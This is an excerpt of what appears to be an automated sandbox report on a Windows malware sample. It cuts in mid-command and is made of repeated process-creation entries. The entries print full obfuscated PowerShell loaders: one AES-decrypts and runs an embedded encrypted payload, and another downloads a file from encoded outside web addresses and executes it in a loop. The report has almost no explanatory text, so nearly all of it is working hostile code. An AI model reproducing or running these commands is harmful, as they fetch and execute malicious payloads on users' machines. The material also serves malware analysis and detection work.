=,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp8